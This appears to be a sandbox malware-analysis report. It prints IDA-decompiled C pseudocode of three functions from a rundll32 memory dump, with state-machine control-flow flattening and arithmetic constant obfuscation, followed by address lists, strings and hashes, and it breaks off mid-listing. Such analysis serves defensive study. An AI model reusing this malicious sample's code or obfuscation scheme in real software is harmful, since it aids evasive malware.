Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C$0$"Am^$)6$,m'$,m'$IH$Zq$oO$q:
API String ID: 0-554904992
Opcode ID: d88456b1a2a5491fb4f0f9382fa610ac31e370ed3fe0d82ef3396b003fac7706
Instruction ID: 682a450adf7095080ea18fb698f3ef1cd547d9e395188630c16122cada58daf1
Opcode Fuzzy Hash: d88456b1a2a5491fb4f0f9382fa610ac31e370ed3fe0d82ef3396b003fac7706
Instruction Fuzzy Hash: 17C14F711183819FDB58CF61D98A41BFBE1FBC5748F218A1EF29686260D7B98918CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002983F0, Relevance: 11.4, Strings: 9, Instructions: 197
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E002983F0() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				void* _t202;
				intOrPtr _t204;
				signed int _t210;
				void* _t212;
				intOrPtr _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int* _t245;

				_t245 =  &_v1132;
				_v1052 = 0x632f4e;
				_v1048 = 0x635133;
				_t212 = 0x16a3f513;
				_t238 = 0;
				_v1044 = 0;
				_v1124 = 0x9f90;
				_v1124 = _v1124 >> 0xa;
				_t239 = 0x3c;
				_v1124 = _v1124 / _t239;
				_v1124 = _v1124 ^ 0x00006131;
				_v1056 = 0x247a;
				_v1056 = _v1056 ^ 0x00001d36;
				_v1100 = 0xd155;
				_v1100 = _v1100 | 0xed29fdfb;
				_v1100 = _v1100 ^ 0xed29d5f9;
				_v1096 = 0xce4f;
				_v1096 = _v1096 ^ 0x20a35301;
				_v1096 = _v1096 | 0x7e045482;
				_v1096 = _v1096 ^ 0x7ea7fd15;
				_v1112 = 0xfc59;
				_t210 = 0x79;
				_t240 = 0x65;
				_v1112 = _v1112 * 0x52;
				_v1112 = _v1112 + 0xd38d;
				_v1112 = _v1112 ^ 0x0051af17;
				_v1072 = 0xec58;
				_v1072 = _v1072 << 0xc;
				_v1072 = _v1072 ^ 0x0ec5d703;
				_v1132 = 0xc721;
				_v1132 = _v1132 + 0xffffc1c4;
				_v1132 = _v1132 * 0x39;
				_v1132 = _v1132 ^ 0x4dd4d269;
				_v1132 = _v1132 ^ 0x4dcaf468;
				_v1064 = 0x4f6d;
				_v1064 = _v1064 >> 2;
				_v1064 = _v1064 ^ 0x0000764d;
				_v1060 = 0xda4f;
				_v1060 = _v1060 * 0x22;
				_v1060 = _v1060 ^ 0x001ce3d4;
				_v1104 = 0xbff0;
				_v1104 = _v1104 << 7;
				_v1104 = _v1104 ^ 0x6305f488;
				_v1104 = _v1104 ^ 0x635a2074;
				_v1108 = 0xd64a;
				_v1108 = _v1108 / _t210;
				_v1108 = _v1108 / _t240;
				_v1108 = _v1108 ^ 0x00004602;
				_v1116 = 0x912b;
				_t241 = 0x19;
				_v1116 = _v1116 / _t241;
				_v1116 = _v1116 ^ 0x45e44a8a;
				_v1116 = _v1116 ^ 0x45e455b1;
				_v1088 = 0x436;
				_v1088 = _v1088 | 0x7e12b186;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0xe12b0ab0;
				_v1084 = 0x66f5;
				_v1084 = _v1084 ^ 0xe16a847f;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 ^ 0x0001a5da;
				_v1092 = 0x4b4f;
				_t242 = 0x41;
				_v1092 = _v1092 * 0x4f;
				_v1092 = _v1092 | 0x992ab812;
				_v1092 = _v1092 ^ 0x993faeb1;
				_v1080 = 0xaa47;
				_v1080 = _v1080 | 0x89157137;
				_v1080 = _v1080 ^ 0x8915ac17;
				_v1068 = 0x9dfd;
				_v1068 = _v1068 ^ 0xa19944f0;
				_v1068 = _v1068 ^ 0xa199c481;
				_v1128 = 0x9c99;
				_v1128 = _v1128 | 0xb1660295;
				_v1128 = _v1128 / _t242;
				_v1128 = _v1128 / _t210;
				_v1128 = _v1128 ^ 0x0005bd51;
				_v1076 = 0x50aa;
				_v1076 = _v1076 >> 4;
				_v1076 = _v1076 ^ 0x0000592b;
				_v1120 = 0x7da8;
				_v1120 = _v1120 + 0xbe3b;
				_v1120 = _v1120 ^ 0x45da291f;
				_v1120 = _v1120 ^ 0x45db2e78;
				do {
					while(_t212 != 0x15d6a069) {
						if(_t212 == 0x16a3f513) {
							_t212 = 0x15d6a069;
							continue;
						} else {
							if(_t212 == 0x21bfbade) {
								E00296C05(_v1068, _v1128,  &_v1040, _v1076, _v1120); // executed
							} else {
								if(_t212 == 0x29cbd021) {
									_push(_v1072);
									_push(_v1112);
									_t202 = E00296ABA(_v1096, 0x2af800, __eflags);
									_t204 =  *0x2b0724; // 0x340cf0
									E0029F882(__eflags, _t202, _v1132, _v1064, _v1060, _v1104, _t204 + 0x238,  &_v1040);
									E0029F935(_v1108, _t202, _v1116, _v1088);
									_t245 =  &(_t245[0xb]);
									_t212 = 0x2fe8bde6;
									continue;
								} else {
									_t252 = _t212 - 0x2fe8bde6;
									if(_t212 != 0x2fe8bde6) {
										goto L10;
									} else {
										E002A533C( &_v520, _v1084, _t252, _v1092, _v1080,  &_v1040); // executed
										_t245 =  &(_t245[3]);
										_t238 =  !=  ? 1 : _t238;
										_t212 = 0x21bfbade;
										continue;
									}
								}
							}
						}
						L13:
						return _t238;
					}
					E0029DD94(_v1124,  &_v520, __eflags, _t212, _v1056, _v1100);
					_t245 =  &(_t245[3]);
					_t212 = 0x29cbd021;
					L10:
					__eflags = _t212 - 0x23d9cc89;
				} while (__eflags != 0);
				goto L13;
			}

0x002983f0
0x002983f6
0x00298400
0x00298408
0x00298411
0x00298413
0x00298417
0x0029841f
0x0029842a
0x0029842f
0x00298435
0x0029843d
0x0029844d
0x00298455
0x0029845d
0x00298465
0x0029846d
0x00298475
0x0029847d
0x00298485
0x0029848d
0x0029849a
0x0029849d
0x002984a0
0x002984a4
0x002984ac
0x002984b4
0x002984bc
0x002984c1
0x002984c9
0x002984d1
0x002984de
0x002984e2
0x002984ea
0x002984f2
0x002984fa
0x002984ff
0x00298507
0x00298514
0x00298518
0x00298520
0x00298528
0x0029852d
0x00298535
0x0029853d
0x0029854d
0x00298559
0x0029855d
0x00298565
0x00298571
0x00298574
0x00298578
0x00298580
0x00298588
0x00298590
0x00298598
0x0029859d
0x002985a5
0x002985af
0x002985bc
0x002985c1
0x002985c9
0x002985d8
0x002985d9
0x002985dd
0x002985e5
0x002985ed
0x002985f5
0x002985fd
0x00298605
0x0029860d
0x00298615
0x0029861d
0x00298625
0x00298635
0x00298644
0x00298648
0x00298650
0x00298658
0x0029865d
0x00298665
0x0029866d
0x00298675
0x0029867d
0x00298685
0x00298685
0x00298693
0x00298748
0x00000000
0x00298699
0x0029869f
0x00298790
0x002986a5
0x002986a7
0x002986e4
0x002986ed
0x002986f5
0x00298701
0x00298723
0x00298736
0x0029873b
0x0029873e
0x00000000
0x002986a9
0x002986a9
0x002986af
0x00000000
0x002986b5
0x002986cd
0x002986d4
0x002986da
0x002986dd
0x00000000
0x002986dd
0x002986af
0x002986a7
0x0029869f
0x00298798
0x002987a4
0x002987a4
0x00298763
0x00298768
0x0029876b
0x0029876d
0x0029876d
0x0029876d
0x00000000

Strings

+Y, xrefs: 0029865D
z$, xrefs: 0029843D
Mv, xrefs: 002984FF
N/c, xrefs: 002983F6
3Qc, xrefs: 00298400
OK, xrefs: 002985C9
1a, xrefs: 00298435
t Zc, xrefs: 00298535
X, xrefs: 002984B4

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +Y$1a$3Qc$Mv$N/c$OK$X$t Zc$z$
API String ID: 0-1098491393
Opcode ID: 4be7d58f104d8dd723f704de8bb55818539c989c738eac54031f392ac0b5a248
Instruction ID: 24acf3751611fc3434820116c1663a1e5c6d22478c0145e1d472cad5a670febf
Opcode Fuzzy Hash: 4be7d58f104d8dd723f704de8bb55818539c989c738eac54031f392ac0b5a248
Instruction Fuzzy Hash: 729130711083819FD758CF66D98A81BFBF2BBC9748F10892DF19686260C7B58A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0029FB04, Relevance: 10.2, Strings: 8, Instructions: 249
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0029FB04() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _t252;
				void* _t254;
				signed int _t256;
				void* _t258;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t286;
				void* _t289;
				void* _t291;
				signed int* _t296;

				_t296 =  &_v684;
				_v576 = 0x5ac1ac;
				_t259 = 0;
				_v572 = 0;
				_v568 = 0;
				_v628 = 0x2293;
				_v628 = _v628 + 0x57c;
				_v628 = _v628 ^ 0xe383fa32;
				_v628 = _v628 ^ 0xe383d2bd;
				_v636 = 0xcb75;
				_v636 = _v636 | 0x941e90a9;
				_v636 = _v636 << 0xf;
				_v636 = _v636 ^ 0x6dfe8001;
				_v664 = 0xe67b;
				_v664 = _v664 >> 0xe;
				_v664 = _v664 | 0xc1c3c44d;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x0183e919;
				_v600 = 0xc7ec;
				_v600 = _v600 + 0xffff53ee;
				_v600 = _v600 ^ 0x00007ae5;
				_v680 = 0x7a6d;
				_v680 = _v680 << 0xa;
				_v680 = _v680 + 0xc175;
				_v680 = _v680 * 0x7f;
				_t289 = 0x32525f80;
				_v680 = _v680 ^ 0xf350284b;
				_v632 = 0x5d09;
				_v632 = _v632 + 0x7e11;
				_v632 = _v632 << 0xc;
				_v632 = _v632 ^ 0x0db1d32b;
				_v652 = 0xdd4b;
				_t261 = 0x47;
				_v652 = _v652 / _t261;
				_v652 = _v652 + 0xfbed;
				_v652 = _v652 >> 0xb;
				_v652 = _v652 ^ 0x00007f13;
				_v660 = 0x7e41;
				_t262 = 0x7f;
				_v660 = _v660 / _t262;
				_v660 = _v660 << 0xe;
				_v660 = _v660 | 0x1cacd9b9;
				_v660 = _v660 ^ 0x1cbffe4a;
				_v644 = 0xb20f;
				_v644 = _v644 << 0xf;
				_v644 = _v644 + 0xffff7dcd;
				_v644 = _v644 ^ 0x5906ced2;
				_v668 = 0x6654;
				_v668 = _v668 + 0xed27;
				_v668 = _v668 | 0x9a46a72a;
				_v668 = _v668 ^ 0x9616be33;
				_v668 = _v668 ^ 0x0c516c93;
				_v624 = 0x9c4e;
				_v624 = _v624 ^ 0x75d8b6b6;
				_v624 = _v624 ^ 0x75d808fe;
				_v616 = 0xe63;
				_v616 = _v616 + 0xffff6360;
				_v616 = _v616 ^ 0xffff0e42;
				_v684 = 0x64e6;
				_t263 = 0x51;
				_v684 = _v684 * 0xa;
				_v684 = _v684 ^ 0x1015d5c6;
				_v684 = _v684 << 0xf;
				_v684 = _v684 ^ 0x129d2ab9;
				_v608 = 0xb1bf;
				_v608 = _v608 / _t263;
				_v608 = _v608 ^ 0x000009d6;
				_v656 = 0x99ce;
				_v656 = _v656 + 0xffff7221;
				_t264 = 9;
				_t288 = _v624;
				_v656 = _v656 * 0x27;
				_v656 = _v656 ^ 0xaff140e9;
				_v656 = _v656 ^ 0xaff0fb08;
				_v672 = 0x29dd;
				_v672 = _v672 | 0xd5e3cd20;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x01f07225;
				_v672 = _v672 ^ 0x8ff7c65c;
				_v640 = 0xff5d;
				_v640 = _v640 << 0xe;
				_v640 = _v640 / _t264;
				_v640 = _v640 ^ 0x0717f5b7;
				_v620 = 0x829a;
				_v620 = _v620 ^ 0x528b6d9c;
				_v620 = _v620 ^ 0x528baa7a;
				_v612 = 0x6e6c;
				_v612 = _v612 | 0xed11f316;
				_v612 = _v612 ^ 0xed11ccce;
				_v676 = 0x502f;
				_t265 = 0x64;
				_v676 = _v676 * 0x3d;
				_v676 = _v676 / _t265;
				_v676 = _v676 >> 0xf;
				_v676 = _v676 ^ 0x00003cfe;
				_v596 = 0x471b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002859;
				_v592 = 0x311;
				_t266 = 0x66;
				_v592 = _v592 / _t266;
				_v592 = _v592 ^ 0x0000118e;
				_v604 = 0xfbca;
				_v604 = _v604 >> 0xb;
				_v604 = _v604 ^ 0x00000a30;
				_v648 = 0x16a5;
				_t267 = 0x39;
				_v648 = _v648 / _t267;
				_v648 = _v648 * 0x45;
				_v648 = _v648 ^ 0x00001b3a;
				do {
					while(_t289 != 0x940afdb) {
						if(_t289 == 0xd57e60e) {
							_t286 =  &_v588;
							E002AC71A(_v596, _t286, _v592, _v604);
							_pop(_t267);
							_t289 = 0x1b246311;
							continue;
						} else {
							if(_t289 == 0x1b246311) {
								_t254 = E0029DD55(_t267);
								_t291 = _v588 - _v548;
								asm("sbb ecx, [esp+0x9c]");
								__eflags = _v584 - _t286;
								if(__eflags >= 0) {
									if(__eflags > 0) {
										L20:
										_t259 = 1;
										__eflags = 1;
									} else {
										__eflags = _t291 - _t254;
										if(_t291 >= _t254) {
											goto L20;
										}
									}
								}
							} else {
								if(_t289 == 0x1c325579) {
									_t256 = E002AA5C0(_v684,  &_v564, _v608, _t288, _t267, _t267, _v656, _v672);
									_t286 = _v620;
									asm("sbb esi, esi");
									_t267 = _v640;
									_t289 = ( ~_t256 & 0xd97e6c8b) + 0x33d97983; // executed
									E002A0DE5(_v640, _v612, _t288, _v676); // executed
									_t296 =  &(_t296[9]);
									goto L15;
								} else {
									if(_t289 == 0x2aad24b3) {
										_t286 =  &_v524;
										_t267 = _v664;
										_t258 = E0029DD94(_v664, _t286, __eflags, _v664, _v600, _v680);
										_t296 =  &(_t296[3]);
										__eflags = _t258;
										if(__eflags != 0) {
											_t289 = 0x940afdb;
											continue;
										}
									} else {
										if(_t289 != 0x32525f80) {
											goto L15;
										} else {
											_t289 = 0x2aad24b3;
											continue;
										}
									}
								}
							}
						}
						L21:
						return _t259;
					}
					_t286 = 0;
					_t252 = E002A8409(_v632, 0, _v652, _v648, _v660, _v632, _v644, _v668, _v624, _v636, _v632,  &_v524, _v628, _v616); // executed
					_t288 = _t252;
					_t296 =  &(_t296[0xc]);
					__eflags = _t252 - 0xffffffff;
					if(__eflags == 0) {
						_t289 = 0x33d97983;
						goto L15;
					} else {
						_t289 = 0x1c325579;
						continue;
					}
					goto L21;
					L15:
					__eflags = _t289 - 0x33d97983;
				} while (__eflags != 0);
				goto L21;
			}

0x0029fb04
0x0029fb0e
0x0029fb18
0x0029fb1a
0x0029fb21
0x0029fb28
0x0029fb30
0x0029fb38
0x0029fb40
0x0029fb48
0x0029fb50
0x0029fb58
0x0029fb5d
0x0029fb65
0x0029fb6d
0x0029fb72
0x0029fb7a
0x0029fb7f
0x0029fb87
0x0029fb8f
0x0029fb97
0x0029fb9f
0x0029fba7
0x0029fbac
0x0029fbbb
0x0029fbbf
0x0029fbc4
0x0029fbcc
0x0029fbd4
0x0029fbdc
0x0029fbe1
0x0029fbe9
0x0029fbf5
0x0029fbfa
0x0029fc00
0x0029fc08
0x0029fc0d
0x0029fc15
0x0029fc21
0x0029fc26
0x0029fc2a
0x0029fc2f
0x0029fc37
0x0029fc3f
0x0029fc47
0x0029fc4c
0x0029fc54
0x0029fc5c
0x0029fc64
0x0029fc6c
0x0029fc74
0x0029fc7c
0x0029fc84
0x0029fc8c
0x0029fc94
0x0029fc9c
0x0029fca4
0x0029fcac
0x0029fcb4
0x0029fcc1
0x0029fcc2
0x0029fcc6
0x0029fcce
0x0029fcd3
0x0029fcdd
0x0029fced
0x0029fcf3
0x0029fd00
0x0029fd08
0x0029fd15
0x0029fd18
0x0029fd1c
0x0029fd20
0x0029fd28
0x0029fd30
0x0029fd38
0x0029fd40
0x0029fd45
0x0029fd4d
0x0029fd55
0x0029fd5d
0x0029fd6a
0x0029fd6e
0x0029fd76
0x0029fd7e
0x0029fd86
0x0029fd8e
0x0029fd96
0x0029fd9e
0x0029fda6
0x0029fdb3
0x0029fdb6
0x0029fdc2
0x0029fdc6
0x0029fdcb
0x0029fdd3
0x0029fddb
0x0029fde0
0x0029fde8
0x0029fdf4
0x0029fdf9
0x0029fdff
0x0029fe07
0x0029fe0f
0x0029fe14
0x0029fe1c
0x0029fe28
0x0029fe2b
0x0029fe34
0x0029fe38
0x0029fe40
0x0029fe40
0x0029fe52
0x0029fefe
0x0029ff0a
0x0029ff10
0x0029ff11
0x00000000
0x0029fe58
0x0029fe5e
0x0029ff74
0x0029ff7d
0x0029ff88
0x0029ff8f
0x0029ff91
0x0029ff93
0x0029ff99
0x0029ff9b
0x0029ff9b
0x0029ff95
0x0029ff95
0x0029ff97
0x00000000
0x00000000
0x0029ff97
0x0029ff93
0x0029fe64
0x0029fe6a
0x0029fecc
0x0029fede
0x0029fee2
0x0029fee4
0x0029feee
0x0029fef0
0x0029fef5
0x00000000
0x0029fe6c
0x0029fe72
0x0029fe8b
0x0029fe97
0x0029fe9b
0x0029fea0
0x0029fea3
0x0029fea5
0x0029feab
0x00000000
0x0029feab
0x0029fe74
0x0029fe7a
0x00000000
0x0029fe80
0x0029fe80
0x00000000
0x0029fe80
0x0029fe7a
0x0029fe72
0x0029fe6a
0x0029fe5e
0x0029ff9f
0x0029ffa8
0x0029ffa8
0x0029ff26
0x0029ff4f
0x0029ff54
0x0029ff56
0x0029ff59
0x0029ff5c
0x0029ff68
0x00000000
0x0029ff5e
0x0029ff5e
0x00000000
0x0029ff5e
0x00000000
0x0029ff6a
0x0029ff6a
0x0029ff6a
0x00000000

Strings

A~, xrefs: 0029FC15
Y(, xrefs: 0029FDE0
], xrefs: 0029FBCC
0, xrefs: 0029FE14
/P, xrefs: 0029FDA6
ln, xrefs: 0029FD8E
', xrefs: 0029FC64
d, xrefs: 0029FCB4

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]$'$/P$0$A~$Y($ln$d
API String ID: 0-2072632330
Opcode ID: 4833ff37654064f1a00f4dda2403697826c919983accc2b4279d84ec91d18f25
Instruction ID: 35d20026242357ac30ec49c40716108a8bf3f1af1963b507c0c6047c33cd7706
Opcode Fuzzy Hash: 4833ff37654064f1a00f4dda2403697826c919983accc2b4279d84ec91d18f25
Instruction Fuzzy Hash: BDC151728183819FE3A8CF25C58A41BFBE2BBC4708F104A1DF5D5962A0D7B59919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00296E8A, Relevance: 9.1, Strings: 7, Instructions: 326
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00296E8A() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				void* _t356;
				intOrPtr _t358;
				intOrPtr _t363;
				void* _t364;
				signed int _t367;
				void* _t370;
				char _t377;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;

				_v528 = _v528 & 0x00000000;
				_v532 = 0x62c78e;
				_t370 = 0x3784a33e;
				_v680 = 0xa975;
				_v680 = _v680 + 0xa87a;
				_v680 = _v680 + 0xffff62c2;
				_t414 = 0x2c;
				_v680 = _v680 / _t414;
				_v680 = _v680 ^ 0x0000041a;
				_t413 = 0;
				_v620 = 0x1834;
				_v620 = _v620 + 0xf82c;
				_t415 = 0x65;
				_v620 = _v620 * 0x72;
				_v620 = _v620 ^ 0x00794bc0;
				_v616 = 0x747d;
				_v616 = _v616 + 0x93e7;
				_v616 = _v616 << 0xf;
				_v616 = _v616 ^ 0x8432188a;
				_v656 = 0xb03a;
				_v656 = _v656 * 0x2f;
				_v656 = _v656 | 0x7f0ecf73;
				_v656 = _v656 ^ 0x7f2e9336;
				_v672 = 0xacda;
				_v672 = _v672 + 0xffff8919;
				_v672 = _v672 + 0xcfe2;
				_v672 = _v672 + 0xc9b1;
				_v672 = _v672 ^ 0x000193cc;
				_v636 = 0xec80;
				_v636 = _v636 / _t415;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0000354a;
				_v640 = 0x3592;
				_v640 = _v640 << 2;
				_t416 = 0x22;
				_v640 = _v640 / _t416;
				_v640 = _v640 ^ 0x00001dae;
				_v684 = 0xa281;
				_v684 = _v684 >> 8;
				_v684 = _v684 | 0xe35d410d;
				_v684 = _v684 + 0xffff6f2e;
				_v684 = _v684 ^ 0xe35cf9bd;
				_v596 = 0x2ec4;
				_v596 = _v596 + 0xffff3adf;
				_v596 = _v596 ^ 0xffff2754;
				_v628 = 0xc12e;
				_v628 = _v628 ^ 0xbda20c33;
				_v628 = _v628 | 0x3478372d;
				_v628 = _v628 ^ 0xbdfae7ec;
				_v668 = 0x1a5d;
				_v668 = _v668 + 0xffff684c;
				_v668 = _v668 + 0x8558;
				_t417 = 0x63;
				_v668 = _v668 / _t417;
				_v668 = _v668 ^ 0x00001217;
				_v676 = 0xaa1a;
				_t418 = 0x78;
				_v676 = _v676 / _t418;
				_v676 = _v676 | 0xe7d7f5c6;
				_v676 = _v676 + 0xffff1566;
				_v676 = _v676 ^ 0xe7d702bd;
				_v648 = 0x1a15;
				_v648 = _v648 + 0xfffff5bd;
				_v648 = _v648 ^ 0x6693c3d8;
				_v648 = _v648 ^ 0x6693bd10;
				_v584 = 0x6666;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x06666ad7;
				_v652 = 0x66ca;
				_v652 = _v652 | 0xb23f766e;
				_v652 = _v652 + 0xba84;
				_v652 = _v652 ^ 0xb2404345;
				_v688 = 0xcf95;
				_v688 = _v688 >> 6;
				_v688 = _v688 >> 2;
				_v688 = _v688 << 0xa;
				_v688 = _v688 ^ 0x00034b7d;
				_v600 = 0xc62d;
				_v600 = _v600 + 0xd94d;
				_v600 = _v600 ^ 0x000191ed;
				_v612 = 0xa6a3;
				_v612 = _v612 | 0x2603b672;
				_v612 = _v612 << 0xb;
				_v612 = _v612 ^ 0x1db7977e;
				_v644 = 0x4dd3;
				_t419 = 0x7f;
				_v644 = _v644 / _t419;
				_v644 = _v644 + 0xffff74a8;
				_v644 = _v644 ^ 0xffff48e7;
				_v664 = 0xa993;
				_t420 = 0x13;
				_v664 = _v664 / _t420;
				_v664 = _v664 + 0xabe6;
				_v664 = _v664 ^ 0x0000cd02;
				_v696 = 0xcbb9;
				_v696 = _v696 << 6;
				_t421 = 0x6a;
				_v696 = _v696 / _t421;
				_t422 = 0x7b;
				_v696 = _v696 / _t422;
				_v696 = _v696 ^ 0x000019cb;
				_v632 = 0xaddd;
				_v632 = _v632 + 0x118c;
				_v632 = _v632 + 0x951d;
				_v632 = _v632 ^ 0x00012ff7;
				_v692 = 0x30f5;
				_v692 = _v692 ^ 0xc1bf2a85;
				_t423 = 0x44;
				_v692 = _v692 / _t423;
				_v692 = _v692 ^ 0x82e02cbd;
				_v692 = _v692 ^ 0x8039685f;
				_v624 = 0x64f0;
				_v624 = _v624 >> 7;
				_v624 = _v624 * 0x5e;
				_v624 = _v624 ^ 0x00002803;
				_v700 = 0xafbe;
				_v700 = _v700 << 1;
				_t424 = 0x46;
				_v700 = _v700 * 0x6e;
				_v700 = _v700 | 0x95531f7e;
				_v700 = _v700 ^ 0x95d774a9;
				_v704 = 0x40c0;
				_v704 = _v704 >> 2;
				_v704 = _v704 + 0xa491;
				_v704 = _v704 + 0xffff61f8;
				_v704 = _v704 ^ 0x00000a06;
				_v660 = 0x38fb;
				_v660 = _v660 | 0x170c0b2f;
				_v660 = _v660 >> 0xc;
				_v660 = _v660 ^ 0x48339c92;
				_v660 = _v660 ^ 0x483283a0;
				_v604 = 0xd60e;
				_v604 = _v604 | 0x6ee599be;
				_v604 = _v604 ^ 0x6ee5a95e;
				_v592 = 0xde69;
				_t369 = _v604;
				_v592 = _v592 * 0x2b;
				_v592 = _v592 ^ 0x00254352;
				_v588 = 0xc199;
				_v588 = _v588 + 0xffff6a5f;
				_v588 = _v588 ^ 0x00000dae;
				_v608 = 0x7a02;
				_v608 = _v608 | 0xd6069959;
				_v608 = _v608 / _t424;
				_v608 = _v608 ^ 0x030eba71;
				while(_t370 != 0x7634a66) {
					if(_t370 == 0x23a0a261) {
						_push(_v684);
						_push(_v640);
						_t356 = E00296ABA(_v636, 0x2af800, __eflags);
						_t358 =  *0x2b0724; // 0x340cf0
						E0029F882(__eflags, _t356, _v596, _v628, _v668, _v676, _t358 + 0x238,  &_v524);
						_t427 = _t427 + 0x24;
						E0029F935(_v648, _t356, _v584, _v652);
						_t370 = 0x3b17a01c;
						continue;
					} else {
						if(_t370 == 0x336f2ef5) {
							_v580 = _v580 - E0029DD55(_t370);
							_t370 = 0x23a0a261;
							asm("sbb [esp+0x94], edx");
							continue;
						} else {
							if(_t370 == 0x3384a220) {
								_t377 = _v580;
								_t363 = _v576;
								_v540 = _v540 & 0x00000000;
								_v572 = _t377;
								_v564 = _t377;
								_v556 = _t377;
								_v548 = _t377;
								_v568 = _t363;
								_v560 = _t363;
								_v552 = _t363;
								_v544 = _t363;
								_t364 = E002994A3(_t369,  &_v572, _v692, _t377, _t377, _v624, _v700, _v704); // executed
								_t427 = _t427 + 0x18;
								__eflags = _t364;
								_t413 =  !=  ? 1 : _t413;
								_t370 = 0x7634a66;
								continue;
							} else {
								if(_t370 == 0x36a7c70f) {
									E002AC71A(_v616,  &_v580, _v656, _v672);
									_t370 = 0x336f2ef5;
									continue;
								} else {
									if(_t370 == 0x3784a33e) {
										_t370 = 0x36a7c70f;
										continue;
									} else {
										if(_t370 != 0x3b17a01c) {
											L16:
											__eflags = _t370 - 0x28eb5b6;
											if(__eflags != 0) {
												continue;
											}
										} else {
											_t367 = E002A8409(_v688, 0, _v600, _v608, _v612, _t370, _v644, _v664, _v696, _v680, _t370,  &_v524, _v620, _v632); // executed
											_t369 = _t367;
											_t427 = _t427 + 0x30;
											if(_t367 != 0xffffffff) {
												_t370 = 0x3384a220;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t413;
				}
				E002A0DE5(_v660, _v592, _t369, _v588);
				_t427 = _t427 + 0xc;
				_t370 = 0x28eb5b6;
				goto L16;
			}

0x00296e90
0x00296e9a
0x00296ea5
0x00296eaa
0x00296eb2
0x00296eba
0x00296ecc
0x00296ed1
0x00296ed7
0x00296edf
0x00296ee1
0x00296ee9
0x00296ef6
0x00296ef9
0x00296efd
0x00296f05
0x00296f0d
0x00296f15
0x00296f1a
0x00296f22
0x00296f2f
0x00296f33
0x00296f3b
0x00296f43
0x00296f4b
0x00296f53
0x00296f5b
0x00296f63
0x00296f6b
0x00296f7b
0x00296f7f
0x00296f84
0x00296f8c
0x00296f94
0x00296f9d
0x00296fa2
0x00296fa8
0x00296fb0
0x00296fb8
0x00296fbd
0x00296fc5
0x00296fcd
0x00296fd5
0x00296fe0
0x00296feb
0x00296ff6
0x00296ffe
0x00297006
0x0029700e
0x00297016
0x0029701e
